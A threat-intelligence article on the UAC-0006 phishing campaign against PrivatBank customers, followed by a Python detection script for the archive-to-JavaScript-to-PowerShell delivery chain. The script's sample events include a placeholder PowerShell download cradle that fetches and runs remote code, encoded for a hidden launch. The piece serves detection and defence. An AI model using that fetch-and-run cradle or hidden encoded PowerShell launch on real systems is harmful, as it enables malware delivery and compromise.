The financially motivated threat group tracked as UAC-0006 is running an ongoing phishing campaign against customers of PrivatBank.
The bank is one of Ukraine’s largest state-owned financial institutions. According to the reports, the current activity delivers password-protected archives containing malicious JavaScript, VBScript or LNK files; the password keeps mail gateways and sandboxes from inspecting the contents before the recipient extracts them.
Since November last year, the group has been sending payment-themed phishing lures. The emails carry attachments disguised as invoices; the JavaScript and VBScript files inside run PowerShell commands that deploy the SmokeLoader malware, which then handles command-and-control (C2) communication.
Researchers note that this chain lets the attackers gain initial access, execute payloads and keep control of compromised systems. The attack begins with a phishing email carrying a password-protected ZIP or RAR archive.
Once the target opens the attachment, the extracted JavaScript or VBScript file starts a sequence of processes that inject malicious code into legitimate Windows processes.
The phishing attack uses LNK files to deceive PrivatBank clients.
UAC-0006 has added LNK (Windows shortcut) files as a new delivery vector in its latest campaign against PrivatBank customers, a technique also used by the Russia-linked, financially motivated group FIN7.
This shift suggests a possible operational overlap with EmpireMonkey and Carbanak, both known for financial cybercrime. The group continues to rely on PowerShell, process injection and non-standard C2 protocols, consistent with its earlier TTPs.
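The delivery chain described above (password-protected archive, then a JavaScript or VBScript file, then PowerShell, then the loader) leaves a recognisable trail in process-creation telemetry. The detection logic below is an added example written for this page; it is not code from the original article or from the researchers it cites. It assumes simplified Sysmon Event ID 1 fields (ProcessId, Image, ParentImage, CommandLine), a short list of user-writable folders where extracted attachments usually land, and runs over constructed sample events rather than real telemetry from this campaign.

```python
"""Flag the archive -> JS/VBS -> PowerShell delivery chain in process-creation events.

Added example (not code from the article or from the cited researchers). Events use
simplified Sysmon Event ID 1 fields; the sample events below are constructed.
"""
import base64
import re
import shlex
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import List, Optional

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf"}
# Folders where an attachment extracted from a ZIP/RAR usually lands (assumption).
USER_WRITABLE = ("\\downloads\\", "\\appdata\\local\\temp\\", "\\temp\\")


@dataclass
class Alert:
    rule: str
    pid: int
    detail: str


def _basename(image: str) -> str:
    return PureWindowsPath(image).name.lower()


def _split_args(cmdline: str) -> List[str]:
    # Non-POSIX mode keeps backslashes and the surrounding quotes intact.
    return shlex.split(cmdline, posix=False)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the -EncodedCommand payload (base64 of UTF-16LE text) if present.

    PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...),
    so match on prefix rather than on the full switch name.
    """
    args = _split_args(cmdline)
    for i, arg in enumerate(args[:-1]):
        if not arg or arg[0] not in "-/":
            continue
        flag = arg[1:].lower()
        if flag and "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(args[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyze_events(events: List[dict]) -> List[Alert]:
    """Apply the three stage rules to a list of process-creation events."""
    alerts: List[Alert] = []
    for ev in events:
        image, parent = _basename(ev["Image"]), _basename(ev["ParentImage"])
        cmd = ev["CommandLine"]

        # Stage 1: an extracted JS/VBS attachment is run by a script host
        # from a user-writable folder.
        if image in SCRIPT_HOSTS:
            for arg in _split_args(cmd)[1:]:
                path = arg.strip('"')
                if PureWindowsPath(path).suffix.lower() in SCRIPT_EXTS and any(
                    loc in path.lower() for loc in USER_WRITABLE
                ):
                    alerts.append(Alert("script_attachment_executed", ev["ProcessId"], path))
                    break

        if image in POWERSHELL:
            # Stage 2: the script hands off to PowerShell.
            if parent in SCRIPT_HOSTS:
                alerts.append(Alert("script_host_spawned_powershell", ev["ProcessId"], parent))
            # Stage 3: PowerShell is launched hidden and/or with an encoded command,
            # regardless of parent (also covers an LNK that starts PowerShell directly).
            decoded = decode_encoded_command(cmd)
            if decoded is not None or re.search(r"-w\w*\s+hidden", cmd, re.IGNORECASE):
                alerts.append(Alert("powershell_obfuscated_launch", ev["ProcessId"], decoded or cmd))
    return alerts


# Constructed sample: the stage-2 payload is a placeholder download cradle pointing at a
# reserved .invalid host, not the real SmokeLoader stager.
STAGE2_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
ENCODED = base64.b64encode(STAGE2_PAYLOAD.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"ProcessId": 4100, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe readme.txt"},  # benign, must not alert
    {"ProcessId": 5212, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\olena\Downloads\Rahunok\Rahunok_0412.js"'},
    {"ProcessId": 5330,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe -w hidden -enc " + ENCODED},
]

if __name__ == "__main__":
    for a in analyze_events(SAMPLE_EVENTS):
        print(f"[{a.rule}] pid={a.pid} {a.detail}")
```

Stage 3 deliberately ignores the parent process, so a shortcut that launches a hidden, encoded PowerShell straight from explorer.exe (the LNK-based variant) still trips it even though stage 2 does not. In production the same rules would run over Sysmon Event ID 1 or Windows Security event 4688 with command-line auditing enabled, and the decoded command would be attached to the alert so an analyst sees the download cradle rather than a base64 blob.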
Phishing of this kind carries several risks. Compromised data, including stolen passwords and financial details, can be used directly for theft or sold on dark-web markets, and harvested credentials give the attackers unauthorised access to bank and corporate accounts.
PrivatBank and the other companies impersonated in such emails may also suffer reputational harm, and because the impersonated party is a financial service provider, the risk extends along its supply chain to the businesses and partners that transact through it.
UAC-0006’s constant evolution reflects the growing sophistication of financially motivated cybercrime groups. Organisations, especially in the banking sector, therefore need more proactive defences and better user awareness to counter such threats.